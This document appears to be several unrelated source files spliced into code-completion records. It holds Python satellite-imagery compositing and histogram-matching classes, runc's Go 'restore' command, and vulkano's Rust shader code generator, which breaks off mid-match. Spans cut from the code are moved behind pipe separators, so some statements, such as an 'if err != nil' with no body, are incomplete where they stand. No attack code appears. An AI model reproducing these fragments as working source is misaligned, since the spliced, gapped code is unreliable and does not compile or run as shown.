:param nir_idx: Index of NIR band in `feature` array
:type nir_idx: int
"""
def __init__(self, feature, feature_composite, red_idx, nir_idx, interpolation='lower'):
super().__init__(feature, feature_composite, percentile=[0, 100], interpolation=interpolation)
self.red_idx = red_idx
self.nir_idx = nir_idx
if not isinstance(nir_idx, int) or not isinstance(red_idx, int):
raise ValueError('Incorrect values of red and NIR band indices specified')
def _get_reference_band(self, data):
""" Extract the NDVI band from time-series
:param data: 4D array from which to compute the NDVI reference band
:type data: numpy array
:return: 3D array containing the NDVI reference band
"""
nir = data[..., self.nir_idx].astype("float32")
red = data[..., self.red_idx].astype("float32")
return (nir - red) / (nir + red)
def _get_indices(self, data):
median = np.nanmedian(data, axis=0)
indices_min = self._index_by_percentile(data, self.percentile[0])
indices_max = self._index_by_percentile(data, self.percentile[1])
indices = np.where(median < -0.05, indices_min, indices_max)
return indices
class MaxNDWICompositing(BaseCompositing):
""" maxNDWI compositing method
- maxNDWI (temporal maximum of NDWI)
:param nir_idx: Index of NIR band in `feature` array
:type nir_idx: int
:param swir1_idx: Index of SWIR1 band in `feature` array
:type swir1_idx: int
"""
def __init__(self, feature, feature_composite, nir_idx, swir1_idx, interpolation='lower'):
super().__init__(feature, feature_composite, percentile=100, interpolation=interpolation)
self.nir_idx = nir_idx
self.swir1_idx = swir1_idx
if not isinstance(nir_idx, int) or not isinstance(swir1_idx, int):
raise ValueError('Incorrect values of NIR and SWIR1 band indices specified')
def _get_reference_band(self, data):
""" Extract the NDWI band from time-series
:param data: 4D array from which to compute the NDWI reference band
:type data: numpy array
:return: 3D array containing the NDWI reference band
"""
nir = data[..., self.nir_idx].astype("float32")
swir1 = data[..., self.swir1_idx].astype("float32")
return (nir - swir1) / (nir + swir1)
class MaxRatioCompositing(BaseCompositing):
""" maxRatio compositing method
- maxRatio (temporal maximum of a ratio using bands blue, NIR and SWIR)
:param blue_idx: Index of blue band in `feature` array
:type blue_idx: int
:param nir_idx: Index of NIR band in `feature` array
:type nir_idx: int
:param swir1_idx: Index of SWIR1 band in `feature` array
:type swir1_idx: int
"""
def __init__(self, feature, feature_composite, blue_idx, nir_idx, swir1_idx, interpolation='lower'):
super().__init__(feature, feature_composite, percentile=100, interpolation=interpolation)
self.blue_idx = blue_idx
self.nir_idx = nir_idx
self.swir1_idx = swir1_idx
if not isinstance(blue_idx, int) or not isinstance(nir_idx, int) or not isinstance(swir1_idx, int):
raise ValueError('Incorrect values for either blue, NIR or SWIR1 band indices specified')
def _get_reference_band(self, data):
""" Extract the max-ratio band from time-series
The max-ratio is defined as max(NIR,SWIR1)/BLUE
:param data: 4D array from which to compute the max-ratio reference band
:type data: numpy array
:return: 3D array containing the max-ratio reference band
"""
blue = data[..., self.blue_idx].astype("float32")
nir = data[..., self.nir_idx].astype("float32")
swir1 = data[..., self.swir1_idx].astype("float32")
return np.nanmax(np.array([nir, swir1]), axis=0) / blue
class HistogramMatching(EOTask):
""" Histogram match of each band of each scene within a time-series with respect to the corresponding band of a
reference composite.
Contributor: Johannes Schmid, GeoVille Information Systems GmbH, 2018
:param feature: Name of the eopatch data layer that will undergo a histogram match.
Should be of the FeatureType "DATA".
:type feature: (FeatureType, str) or (FeatureType, str, str)
:param reference: Name of the eopatch data layer that represents the reference for the histogram match.
Should be of the FeatureType "DATA_TIMELESS".
:type reference: (FeatureType, str)
"""
def __init__(self, feature, reference):
self.feature = self._parse_features(feature, new_names=True,
default_feature_type=FeatureType.DATA,
rename_function='{}_NORMALISED'.format)
self.reference = self._parse_features(reference, default_feature_type=FeatureType.DATA_TIMELESS)
def execute(self, eopatch):
""" Perform histogram matching of the time-series with respect to a reference scene
:param eopatch: eopatch holding the time-series and reference data
:type eopatch: EOPatch
:return: The same eopatch instance with the normalised time-series
"""
feature_type, feature_name, new_feature_name = next(self.feature(eopatch))
reference_type, reference_name = next(self.reference(eopatch))
reference_scene = eopatch[reference_type][reference_name]
# check if band dimension matches
if reference_scene.shape[-1] != eopatch[feature_type][feature_name].shape[-1]:
raise ValueError('Time-series and reference scene must have corresponding bands')
eopatch[feature_type][new_feature_name] = np.zeros_like(eopatch[feature_type][feature_name])
for source_id, source in enumerate(eopatch[feature_type][feature_name]):
# mask-out same invalid pixels
src_masked = np.where(np.isnan(reference_scene), np.nan, source)
ref_masked = np.where(np.isnan(source), np.nan, reference_scene)
# compute statistics
std_ref = np.nanstd(ref_masked, axis=(0, 1), dtype=np.float64)
std_src = np.nanstd(src_masked, axis=(0, 1), dtype=np.float64)
mean_ref = np.nanmean(ref_masked, axis=(0, 1), dtype=np.float64)
mean_src = np.nanmean(src_masked, axis=(0, 1), dtype=np.float64)
# normalise values
eopatch[feature_type][new_feature_name][source_id] = \
source * (std_ref / std_src) + (mean_ref - (mean_src * (std_ref / std_src)))
return eopatch
| __init__ |
restore.go | // +build linux
package main
import (
"os"
"github.com/opencontainers/runc/libcontainer"
"github.com/opencontainers/runc/libcontainer/userns"
"github.com/sirupsen/logrus"
"github.com/urfave/cli"
)
var restoreCommand = cli.Command{
Name: "restore",
Usage: "restore a container from a previous checkpoint",
ArgsUsage: `<container-id>
Where "<container-id>" is the name for the instance of the container to be
restored.`,
Description: `Restores the saved state of the container instance that was previously saved
using the runc checkpoint command.`,
Flags: []cli.Flag{
cli.StringFlag{
Name: "console-socket",
Value: "",
Usage: "path to an AF_UNIX socket which will receive a file descriptor referencing the master end of the console's pseudoterminal",
},
cli.StringFlag{
Name: "image-path",
Value: "",
Usage: "path to criu image files for restoring",
},
cli.StringFlag{
Name: "work-path",
Value: "",
Usage: "path for saving work files and logs",
},
cli.BoolFlag{
Name: "tcp-established",
Usage: "allow open tcp connections",
},
cli.BoolFlag{
Name: "ext-unix-sk",
Usage: "allow external unix sockets",
},
cli.BoolFlag{
Name: "shell-job",
Usage: "allow shell jobs",
},
cli.BoolFlag{
Name: "file-locks",
Usage: "handle file locks, for safety",
},
cli.StringFlag{
Name: "manage-cgroups-mode",
Value: "",
Usage: "cgroups mode: 'soft' (default), 'full' and 'strict'",
},
cli.StringFlag{
Name: "bundle, b",
Value: "",
Usage: "path to the root of the bundle directory",
},
cli.BoolFlag{
Name: "detach,d",
Usage: "detach from the container's process",
},
cli.StringFlag{
Name: "pid-file",
Value: "",
Usage: "specify the file to write the process id to",
},
cli.BoolFlag{
Name: "no-subreaper",
Usage: "disable the use of the subreaper used to reap reparented processes",
},
cli.BoolFlag{
Name: "no-pivot",
Usage: "do not use pivot root to jail process inside rootfs. This should be used whenever the rootfs is on top of a ramdisk",
},
cli.StringSliceFlag{
Name: "empty-ns",
Usage: "create a namespace, but don't restore its properties",
},
cli.BoolFlag{
Name: "auto-dedup",
Usage: "enable auto deduplication of memory images",
},
cli.BoolFlag{
Name: "lazy-pages",
Usage: "use userfaultfd to lazily restore memory pages",
},
cli.StringFlag{
Name: "lsm-profile",
Value: "",
Usage: "Specify an LSM profile to be used during restore in the form of TYPE:NAME.",
},
},
Action: func(context *cli.Context) error {
if err := checkArgs(context, 1, exactArgs); err != nil {
return err
}
// XXX: Currently this is untested with rootless containers.
if os.Geteuid() != 0 || userns.RunningInUserNS() {
logrus.Warn("runc checkpoint is untested with rootless containers")
}
spec, err := setupSpec(context)
if err != nil |
options := criuOptions(context)
if err := setEmptyNsMask(context, options); err != nil {
return err
}
status, err := startContainer(context, spec, CT_ACT_RESTORE, options)
if err != nil {
return err
}
// exit with the container's exit status so any external supervisor is
// notified of the exit with the correct exit status.
os.Exit(status)
return nil
},
}
func criuOptions(context *cli.Context) *libcontainer.CriuOpts {
imagePath, parentPath, err := prepareImagePaths(context)
if err != nil {
fatal(err)
}
return &libcontainer.CriuOpts{
ImagesDirectory: imagePath,
WorkDirectory: context.String("work-path"),
ParentImage: parentPath,
LeaveRunning: context.Bool("leave-running"),
TcpEstablished: context.Bool("tcp-established"),
ExternalUnixConnections: context.Bool("ext-unix-sk"),
ShellJob: context.Bool("shell-job"),
FileLocks: context.Bool("file-locks"),
PreDump: context.Bool("pre-dump"),
AutoDedup: context.Bool("auto-dedup"),
LazyPages: context.Bool("lazy-pages"),
StatusFd: context.Int("status-fd"),
LsmProfile: context.String("lsm-profile"),
}
}
| {
return err
} |
codegen.rs | // Copyright (c) 2016 The vulkano developers
// Licensed under the Apache License, Version 2.0
// <LICENSE-APACHE or
// https://www.apache.org/licenses/LICENSE-2.0> or the MIT
// license <LICENSE-MIT or https://opensource.org/licenses/MIT>,
// at your option. All files in the project carrying such
// notice may not be copied, modified, or distributed except
// according to those terms.
use crate::entry_point;
use crate::read_file_to_string;
use crate::spec_consts;
use crate::structs;
use crate::RegisteredType;
use crate::TypesMeta;
use proc_macro2::{Span, TokenStream};
pub use shaderc::{CompilationArtifact, IncludeType, ResolvedInclude, ShaderKind};
use shaderc::{CompileOptions, Compiler, EnvVersion, SpirvVersion, TargetEnv};
use std::collections::HashMap;
use std::iter::Iterator;
use std::path::Path;
use std::{
cell::{RefCell, RefMut},
io::Error as IoError,
};
use syn::Ident;
use vulkano::{
spirv::{Capability, Instruction, Spirv, SpirvError, StorageClass},
Version,
};
pub(super) fn path_to_str(path: &Path) -> &str {
path.to_str().expect(
"Could not stringify the file to be included. Make sure the path consists of \
valid unicode characters.",
)
}
fn include_callback(
requested_source_path_raw: &str,
directive_type: IncludeType,
contained_within_path_raw: &str,
recursion_depth: usize,
include_directories: &[impl AsRef<Path>],
root_source_has_path: bool,
base_path: &impl AsRef<Path>,
mut includes_tracker: RefMut<Vec<String>>,
) -> Result<ResolvedInclude, String> {
let file_to_include = match directive_type {
IncludeType::Relative => {
let requested_source_path = Path::new(requested_source_path_raw);
// Is embedded current shader source embedded within a rust macro?
// If so, abort unless absolute path.
if !root_source_has_path && recursion_depth == 1 && !requested_source_path.is_absolute()
{
let requested_source_name = requested_source_path
.file_name()
.expect("Could not get the name of the requested source file.")
.to_string_lossy();
let requested_source_directory = requested_source_path
.parent()
.expect("Could not get the directory of the requested source file.")
.to_string_lossy();
return Err(format!(
"Usage of relative paths in imports in embedded GLSL is not \
allowed, try using `#include <{}>` and adding the directory \
`{}` to the `include` array in your `shader!` macro call \
instead.",
requested_source_name, requested_source_directory
));
}
let mut resolved_path = if recursion_depth == 1 {
Path::new(contained_within_path_raw)
.parent()
.map(|parent| base_path.as_ref().join(parent))
} else {
Path::new(contained_within_path_raw)
.parent()
.map(|parent| parent.to_owned())
}
.unwrap_or_else(|| {
panic!(
"The file `{}` does not reside in a directory. This is \
an implementation error.",
contained_within_path_raw
)
});
resolved_path.push(requested_source_path);
if !resolved_path.is_file() {
return Err(format!(
"Invalid inclusion path `{}`, the path does not point to a file.",
requested_source_path_raw
));
}
resolved_path
}
IncludeType::Standard => {
let requested_source_path = Path::new(requested_source_path_raw);
if requested_source_path.is_absolute() {
// This message is printed either when using a missing file with an absolute path
// in the relative include directive or when using absolute paths in a standard
// include directive.
return Err(format!(
"No such file found, as specified by the absolute path. \
Keep in mind, that absolute paths cannot be used with \
inclusion from standard directories (`#include <...>`), try \
using `#include \"...\"` instead. Requested path: {}",
requested_source_path_raw
));
}
let found_requested_source_path = include_directories
.iter()
.map(|include_directory| include_directory.as_ref().join(requested_source_path))
.find(|resolved_requested_source_path| resolved_requested_source_path.is_file());
if let Some(found_requested_source_path) = found_requested_source_path {
found_requested_source_path
} else {
return Err(format!(
"Could not include the file `{}` from any include directories.",
requested_source_path_raw
));
}
}
};
let file_to_include_string = path_to_str(file_to_include.as_path()).to_string();
let content = read_file_to_string(file_to_include.as_path()).map_err(|_| {
format!(
"Could not read the contents of file `{}` to be included in the \
shader source.",
&file_to_include_string
)
})?;
includes_tracker.push(file_to_include_string.clone());
Ok(ResolvedInclude {
resolved_name: file_to_include_string,
content,
})
}
pub fn compile(
path: Option<String>,
base_path: &impl AsRef<Path>,
code: &str,
ty: ShaderKind,
include_directories: &[impl AsRef<Path>],
macro_defines: &[(impl AsRef<str>, impl AsRef<str>)],
vulkan_version: Option<EnvVersion>,
spirv_version: Option<SpirvVersion>,
) -> Result<(CompilationArtifact, Vec<String>), String> {
let includes_tracker = RefCell::new(Vec::new());
let mut compiler = Compiler::new().ok_or("failed to create GLSL compiler")?;
let mut compile_options = CompileOptions::new().ok_or("failed to initialize compile option")?;
compile_options.set_target_env(
TargetEnv::Vulkan,
vulkan_version.unwrap_or(EnvVersion::Vulkan1_0) as u32,
);
if let Some(spirv_version) = spirv_version {
compile_options.set_target_spirv(spirv_version);
}
let root_source_path = if let &Some(ref path) = &path {
path
} else {
// An arbitrary placeholder file name for embedded shaders
"shader.glsl"
};
// Specify file resolution callback for the `#include` directive
compile_options.set_include_callback(
|requested_source_path, directive_type, contained_within_path, recursion_depth| {
include_callback(
requested_source_path,
directive_type,
contained_within_path,
recursion_depth,
include_directories,
path.is_some(),
base_path,
includes_tracker.borrow_mut(),
)
},
);
for (macro_name, macro_value) in macro_defines.iter() {
compile_options.add_macro_definition(macro_name.as_ref(), Some(macro_value.as_ref()));
}
let content = compiler
.compile_into_spirv(&code, ty, root_source_path, "main", Some(&compile_options))
.map_err(|e| e.to_string())?;
let includes = includes_tracker.borrow().clone();
Ok((content, includes))
}
pub(super) fn reflect<'a, I>(
prefix: &'a str,
words: &[u32],
types_meta: &TypesMeta,
input_paths: I,
exact_entrypoint_interface: bool,
shared_constants: bool,
types_registry: &'a mut HashMap<String, RegisteredType>,
) -> Result<(TokenStream, TokenStream), Error>
where
I: IntoIterator<Item = &'a str>,
{
let struct_name = Ident::new(&format!("{}Shader", prefix), Span::call_site());
let spirv = Spirv::new(words)?;
// checking whether each required capability is enabled in the Vulkan device
let mut cap_checks: Vec<TokenStream> = vec![];
match spirv.version() {
Version::V1_0 => {}
Version::V1_1 | Version::V1_2 | Version::V1_3 => {
cap_checks.push(quote! {
if device.api_version() < Version::V1_1 {
panic!("Device API version 1.1 required");
}
});
}
Version::V1_4 => {
cap_checks.push(quote! {
if device.api_version() < Version::V1_2
&& !device.enabled_extensions().khr_spirv_1_4 {
panic!("Device API version 1.2 or extension VK_KHR_spirv_1_4 required");
}
});
}
Version::V1_5 => {
cap_checks.push(quote! {
if device.api_version() < Version::V1_2 {
panic!("Device API version 1.2 required");
}
});
}
_ => return Err(Error::UnsupportedSpirvVersion),
}
for i in spirv.instructions() {
let dev_req = {
match i {
Instruction::Variable {
result_type_id: _,
result_id: _,
storage_class,
initializer: _,
} => storage_class_requirement(storage_class),
Instruction::TypePointer {
result_id: _,
storage_class,
ty: _,
} => storage_class_requirement(storage_class),
Instruction::Capability { capability } => capability_requirement(capability),
_ => &[],
}
};
if dev_req.len() == 0 {
continue;
}
let (conditions, messages): (Vec<_>, Vec<_>) = dev_req
.iter()
.map(|req| match req {
DeviceRequirement::Extension(extension) => {
let ident = Ident::new(extension, Span::call_site());
(
quote! { device.enabled_extensions().#ident },
format!("extension {}", extension),
)
}
DeviceRequirement::Feature(feature) => {
let ident = Ident::new(feature, Span::call_site());
(
quote! { device.enabled_features().#ident },
format!("feature {}", feature),
)
}
DeviceRequirement::Version(major, minor) => {
let ident = format_ident!("V{}_{}", major, minor);
(
quote! { device.api_version() >= crate::Version::#ident },
format!("API version {}.{}", major, minor),
)
}
})
.unzip();
let messages = messages.join(", ");
cap_checks.push(quote! {
if !std::array::IntoIter::new([#(#conditions),*]).all(|x| x) {
panic!("One of the following must be enabled on the device: {}", #messages);
}
});
}
// writing one method for each entry point of this module
let mut entry_points_inside_impl: Vec<TokenStream> = vec![];
for instruction in spirv
.iter_entry_point()
.filter(|instruction| matches!(instruction, Instruction::EntryPoint { .. }))
{
let entry_point = entry_point::write_entry_point(
prefix,
&spirv,
instruction,
types_meta,
exact_entrypoint_interface,
shared_constants,
);
entry_points_inside_impl.push(entry_point);
}
let include_bytes = input_paths.into_iter().map(|s| {
quote! {
// using include_bytes here ensures that changing the shader will force recompilation.
// The bytes themselves can be optimized out by the compiler as they are unused.
::std::include_bytes!( #s )
}
});
let structs = structs::write_structs(prefix, &spirv, types_meta, types_registry);
let specialization_constants = spec_consts::write_specialization_constants(
prefix,
&spirv,
types_meta,
shared_constants,
types_registry,
);
let shader_code = quote! {
pub struct #struct_name {
shader: ::std::sync::Arc<::vulkano::pipeline::shader::ShaderModule>,
}
impl #struct_name {
/// Loads the shader in Vulkan as a `ShaderModule`.
#[inline]
#[allow(unsafe_code)]
pub fn load(device: ::std::sync::Arc<::vulkano::device::Device>)
-> Result<#struct_name, ::vulkano::OomError>
{
let _bytes = ( #( #include_bytes),* );
#( #cap_checks )*
static WORDS: &[u32] = &[ #( #words ),* ];
unsafe {
Ok(#struct_name {
shader: ::vulkano::pipeline::shader::ShaderModule::from_words(device, WORDS)?
})
}
}
/// Returns the module that was created.
#[allow(dead_code)]
#[inline]
pub fn module(&self) -> &::std::sync::Arc<::vulkano::pipeline::shader::ShaderModule> {
&self.shader
}
#( #entry_points_inside_impl )*
}
#specialization_constants
};
Ok((shader_code, structs))
}
#[derive(Debug)]
pub enum Error {
UnsupportedSpirvVersion,
IoError(IoError),
SpirvError(SpirvError),
}
impl From<IoError> for Error {
#[inline]
fn from(err: IoError) -> Error {
Error::IoError(err)
}
}
impl From<SpirvError> for Error {
#[inline]
fn from(err: SpirvError) -> Error {
Error::SpirvError(err)
}
}
/// Returns the Vulkan device requirement for a SPIR-V `OpCapability`.
#[rustfmt::skip]
fn capability_requirement(cap: &Capability) -> &'static [DeviceRequirement] {
match *cap {
Capability::Matrix => &[],
Capability::Shader => &[],
Capability::InputAttachment => &[],
Capability::Sampled1D => &[],
Capability::Image1D => &[],
Capability::SampledBuffer => &[],
Capability::ImageBuffer => &[],
Capability::ImageQuery => &[],
Capability::DerivativeControl => &[],
Capability::Geometry => &[DeviceRequirement::Feature("geometry_shader")],
Capability::Tessellation => &[DeviceRequirement::Feature("tessellation_shader")],
Capability::Float64 => &[DeviceRequirement::Feature("shader_float64")],
Capability::Int64 => &[DeviceRequirement::Feature("shader_int64")],
Capability::Int64Atomics => &[
DeviceRequirement::Feature("shader_buffer_int64_atomics"),
DeviceRequirement::Feature("shader_shared_int64_atomics"),
DeviceRequirement::Feature("shader_image_int64_atomics"),
],
/* Capability::AtomicFloat16AddEXT => &[
DeviceRequirement::Feature("shader_buffer_float16_atomic_add"),
DeviceRequirement::Feature("shader_shared_float16_atomic_add"),
], */
Capability::AtomicFloat32AddEXT => &[
DeviceRequirement::Feature("shader_buffer_float32_atomic_add"),
DeviceRequirement::Feature("shader_shared_float32_atomic_add"),
DeviceRequirement::Feature("shader_image_float32_atomic_add"),
],
Capability::AtomicFloat64AddEXT => &[
DeviceRequirement::Feature("shader_buffer_float64_atomic_add"),
DeviceRequirement::Feature("shader_shared_float64_atomic_add"),
],
/* Capability::AtomicFloat16MinMaxEXT => &[
DeviceRequirement::Feature("shader_buffer_float16_atomic_min_max"),
DeviceRequirement::Feature("shader_shared_float16_atomic_min_max"),
], */
/* Capability::AtomicFloat32MinMaxEXT => &[
DeviceRequirement::Feature("shader_buffer_float32_atomic_min_max"),
DeviceRequirement::Feature("shader_shared_float32_atomic_min_max"),
DeviceRequirement::Feature("shader_image_float32_atomic_min_max"),
], */
/* Capability::AtomicFloat64MinMaxEXT => &[
DeviceRequirement::Feature("shader_buffer_float64_atomic_min_max"),
DeviceRequirement::Feature("shader_shared_float64_atomic_min_max"),
], */
Capability::Int64ImageEXT => &[DeviceRequirement::Feature("shader_image_int64_atomics")],
Capability::Int16 => &[DeviceRequirement::Feature("shader_int16")],
Capability::TessellationPointSize => &[DeviceRequirement::Feature(
"shader_tessellation_and_geometry_point_size",
)],
Capability::GeometryPointSize => &[DeviceRequirement::Feature(
"shader_tessellation_and_geometry_point_size",
)],
Capability::ImageGatherExtended => {
&[DeviceRequirement::Feature("shader_image_gather_extended")]
}
Capability::StorageImageMultisample => &[DeviceRequirement::Feature(
"shader_storage_image_multisample",
)],
Capability::UniformBufferArrayDynamicIndexing => &[DeviceRequirement::Feature(
"shader_uniform_buffer_array_dynamic_indexing",
)],
Capability::SampledImageArrayDynamicIndexing => &[DeviceRequirement::Feature(
"shader_sampled_image_array_dynamic_indexing",
)],
Capability::StorageBufferArrayDynamicIndexing => &[DeviceRequirement::Feature(
"shader_storage_buffer_array_dynamic_indexing",
)],
Capability::StorageImageArrayDynamicIndexing => &[DeviceRequirement::Feature(
"shader_storage_image_array_dynamic_indexing",
)],
Capability::ClipDistance => &[DeviceRequirement::Feature("shader_clip_distance")],
Capability::CullDistance => &[DeviceRequirement::Feature("shader_cull_distance")],
Capability::ImageCubeArray => &[DeviceRequirement::Feature("image_cube_array")],
Capability::SampleRateShading => &[DeviceRequirement::Feature("sample_rate_shading")],
Capability::SparseResidency => &[DeviceRequirement::Feature("shader_resource_residency")],
Capability::MinLod => &[DeviceRequirement::Feature("shader_resource_min_lod")],
Capability::SampledCubeArray => &[DeviceRequirement::Feature("image_cube_array")],
Capability::ImageMSArray => &[DeviceRequirement::Feature(
"shader_storage_image_multisample",
)],
Capability::StorageImageExtendedFormats => &[],
Capability::InterpolationFunction => &[DeviceRequirement::Feature("sample_rate_shading")],
Capability::StorageImageReadWithoutFormat => &[DeviceRequirement::Feature(
"shader_storage_image_read_without_format",
)],
Capability::StorageImageWriteWithoutFormat => &[DeviceRequirement::Feature(
"shader_storage_image_write_without_format",
)],
Capability::MultiViewport => &[DeviceRequirement::Feature("multi_viewport")],
Capability::DrawParameters => &[
DeviceRequirement::Feature("shader_draw_parameters"),
DeviceRequirement::Extension("khr_shader_draw_parameters"),
],
Capability::MultiView => &[DeviceRequirement::Feature("multiview")],
Capability::DeviceGroup => &[
DeviceRequirement::Version(1, 1),
DeviceRequirement::Extension("khr_device_group"),
],
Capability::VariablePointersStorageBuffer => &[DeviceRequirement::Feature(
"variable_pointers_storage_buffer",
)],
Capability::VariablePointers => &[DeviceRequirement::Feature("variable_pointers")],
Capability::ShaderClockKHR => &[DeviceRequirement::Extension("khr_shader_clock")],
Capability::StencilExportEXT => {
&[DeviceRequirement::Extension("ext_shader_stencil_export")]
}
Capability::SubgroupBallotKHR => {
&[DeviceRequirement::Extension("ext_shader_subgroup_ballot")]
}
Capability::SubgroupVoteKHR => &[DeviceRequirement::Extension("ext_shader_subgroup_vote")],
Capability::ImageReadWriteLodAMD => &[DeviceRequirement::Extension(
"amd_shader_image_load_store_lod",
)],
Capability::ImageGatherBiasLodAMD => {
&[DeviceRequirement::Extension("amd_texture_gather_bias_lod")]
}
Capability::FragmentMaskAMD => &[DeviceRequirement::Extension("amd_shader_fragment_mask")],
Capability::SampleMaskOverrideCoverageNV => &[DeviceRequirement::Extension(
"nv_sample_mask_override_coverage",
)],
Capability::GeometryShaderPassthroughNV => &[DeviceRequirement::Extension(
"nv_geometry_shader_passthrough",
)],
Capability::ShaderViewportIndex => {
&[DeviceRequirement::Feature("shader_output_viewport_index")]
}
Capability::ShaderLayer => &[DeviceRequirement::Feature("shader_output_layer")],
Capability::ShaderViewportIndexLayerEXT => &[
DeviceRequirement::Extension("ext_shader_viewport_index_layer"),
DeviceRequirement::Extension("nv_viewport_array2"),
],
Capability::ShaderViewportMaskNV => &[DeviceRequirement::Extension("nv_viewport_array2")],
Capability::PerViewAttributesNV => &[DeviceRequirement::Extension(
"nvx_multiview_per_view_attributes",
)],
Capability::StorageBuffer16BitAccess => {
&[DeviceRequirement::Feature("storage_buffer16_bit_access")]
}
Capability::UniformAndStorageBuffer16BitAccess => &[DeviceRequirement::Feature(
"uniform_and_storage_buffer16_bit_access",
)],
Capability::StoragePushConstant16 => {
&[DeviceRequirement::Feature("storage_push_constant16")]
}
Capability::StorageInputOutput16 => &[DeviceRequirement::Feature("storage_input_output16")],
Capability::GroupNonUniform => todo!(),
Capability::GroupNonUniformVote => todo!(),
Capability::GroupNonUniformArithmetic => todo!(),
Capability::GroupNonUniformBallot => todo!(),
Capability::GroupNonUniformShuffle => todo!(),
Capability::GroupNonUniformShuffleRelative => todo!(),
Capability::GroupNonUniformClustered => todo!(),
Capability::GroupNonUniformQuad => todo!(),
Capability::GroupNonUniformPartitionedNV => todo!(),
Capability::SampleMaskPostDepthCoverage => {
&[DeviceRequirement::Extension("ext_post_depth_coverage")]
}
Capability::ShaderNonUniform => &[
DeviceRequirement::Version(1, 2),
DeviceRequirement::Extension("ext_descriptor_indexing"),
],
Capability::RuntimeDescriptorArray => {
&[DeviceRequirement::Feature("runtime_descriptor_array")]
}
Capability::InputAttachmentArrayDynamicIndexing => &[DeviceRequirement::Feature(
"shader_input_attachment_array_dynamic_indexing",
)],
Capability::UniformTexelBufferArrayDynamicIndexing => &[DeviceRequirement::Feature(
"shader_uniform_texel_buffer_array_dynamic_indexing",
)],
Capability::StorageTexelBufferArrayDynamicIndexing => &[DeviceRequirement::Feature(
"shader_storage_texel_buffer_array_dynamic_indexing",
)],
Capability::UniformBufferArrayNonUniformIndexing => &[DeviceRequirement::Feature(
"shader_uniform_buffer_array_non_uniform_indexing",
)],
Capability::SampledImageArrayNonUniformIndexing => &[DeviceRequirement::Feature(
"shader_sampled_image_array_non_uniform_indexing",
)],
Capability::StorageBufferArrayNonUniformIndexing => &[DeviceRequirement::Feature(
"shader_storage_buffer_array_non_uniform_indexing",
)],
Capability::StorageImageArrayNonUniformIndexing => &[DeviceRequirement::Feature(
"shader_storage_image_array_non_uniform_indexing",
)],
Capability::InputAttachmentArrayNonUniformIndexing => &[DeviceRequirement::Feature(
"shader_input_attachment_array_non_uniform_indexing",
)],
Capability::UniformTexelBufferArrayNonUniformIndexing => &[DeviceRequirement::Feature(
"shader_uniform_texel_buffer_array_non_uniform_indexing",
)],
Capability::StorageTexelBufferArrayNonUniformIndexing => &[DeviceRequirement::Feature(
"shader_storage_texel_buffer_array_non_uniform_indexing",
)],
Capability::Float16 => &[
DeviceRequirement::Feature("shader_float16"),
DeviceRequirement::Extension("amd_gpu_shader_half_float"),
],
Capability::Int8 => &[DeviceRequirement::Feature("shader_int8")],
Capability::StorageBuffer8BitAccess => {
&[DeviceRequirement::Feature("storage_buffer8_bit_access")]
}
Capability::UniformAndStorageBuffer8BitAccess => &[DeviceRequirement::Feature(
"uniform_and_storage_buffer8_bit_access",
)],
Capability::StoragePushConstant8 => &[DeviceRequirement::Feature("storage_push_constant8")],
Capability::VulkanMemoryModel => &[DeviceRequirement::Feature("vulkan_memory_model")],
Capability::VulkanMemoryModelDeviceScope => &[DeviceRequirement::Feature(
"vulkan_memory_model_device_scope",
)],
Capability::DenormPreserve => todo!(),
Capability::DenormFlushToZero => todo!(),
Capability::SignedZeroInfNanPreserve => todo!(),
Capability::RoundingModeRTE => todo!(),
Capability::RoundingModeRTZ => todo!(),
Capability::ComputeDerivativeGroupQuadsNV => {
&[DeviceRequirement::Feature("compute_derivative_group_quads")]
}
Capability::ComputeDerivativeGroupLinearNV => &[DeviceRequirement::Feature(
"compute_derivative_group_linear",
)],
Capability::FragmentBarycentricNV => {
&[DeviceRequirement::Feature("fragment_shader_barycentric")]
}
Capability::ImageFootprintNV => &[DeviceRequirement::Feature("image_footprint")],
Capability::MeshShadingNV => &[DeviceRequirement::Extension("nv_mesh_shader")],
Capability::RayTracingKHR | Capability::RayTracingProvisionalKHR => {
&[DeviceRequirement::Feature("ray_tracing_pipeline")]
}
Capability::RayQueryKHR | Capability::RayQueryProvisionalKHR => &[DeviceRequirement::Feature("ray_query")],
Capability::RayTraversalPrimitiveCullingKHR => &[DeviceRequirement::Feature(
"ray_traversal_primitive_culling",
)],
Capability::RayTracingNV => &[DeviceRequirement::Extension("nv_ray_tracing")],
// Capability::RayTracingMotionBlurNV => &[DeviceRequirement::Feature("ray_tracing_motion_blur")],
Capability::TransformFeedback => &[DeviceRequirement::Feature("transform_feedback")],
Capability::GeometryStreams => &[DeviceRequirement::Feature("geometry_streams")],
Capability::FragmentDensityEXT => &[
DeviceRequirement::Feature("fragment_density_map"),
DeviceRequirement::Feature("shading_rate_image"),
],
Capability::PhysicalStorageBufferAddresses => {
&[DeviceRequirement::Feature("buffer_device_address")]
}
Capability::CooperativeMatrixNV => &[DeviceRequirement::Feature("cooperative_matrix")],
Capability::IntegerFunctions2INTEL => {
&[DeviceRequirement::Feature("shader_integer_functions2")]
}
Capability::ShaderSMBuiltinsNV => &[DeviceRequirement::Feature("shader_sm_builtins")],
Capability::FragmentShaderSampleInterlockEXT => &[DeviceRequirement::Feature(
"fragment_shader_sample_interlock",
)],
Capability::FragmentShaderPixelInterlockEXT => &[DeviceRequirement::Feature(
"fragment_shader_pixel_interlock",
)],
Capability::FragmentShaderShadingRateInterlockEXT => &[
DeviceRequirement::Feature("fragment_shader_shading_rate_interlock"),
DeviceRequirement::Feature("shading_rate_image"),
],
Capability::DemoteToHelperInvocationEXT => &[DeviceRequirement::Feature(
"shader_demote_to_helper_invocation",
)],
Capability::FragmentShadingRateKHR => &[
DeviceRequirement::Feature("pipeline_fragment_shading_rate"),
DeviceRequirement::Feature("primitive_fragment_shading_rate"),
DeviceRequirement::Feature("attachment_fragment_shading_rate"),
],
// Capability::WorkgroupMemoryExplicitLayoutKHR => &[DeviceRequirement::Feature("workgroup_memory_explicit_layout")],
// Capability::WorkgroupMemoryExplicitLayout8BitAccessKHR => &[DeviceRequirement::Feature("workgroup_memory_explicit_layout8_bit_access")],
// Capability::WorkgroupMemoryExplicitLayout16BitAccessKHR => &[DeviceRequirement::Feature("workgroup_memory_explicit_layout16_bit_access")],
Capability::Addresses => panic!(), // not supported
Capability::Linkage => panic!(), // not supported
Capability::Kernel => panic!(), // not supported
Capability::Vector16 => panic!(), // not supported
Capability::Float16Buffer => panic!(), // not supported
Capability::ImageBasic => panic!(), // not supported
Capability::ImageReadWrite => panic!(), // not supported
Capability::ImageMipmap => panic!(), // not supported
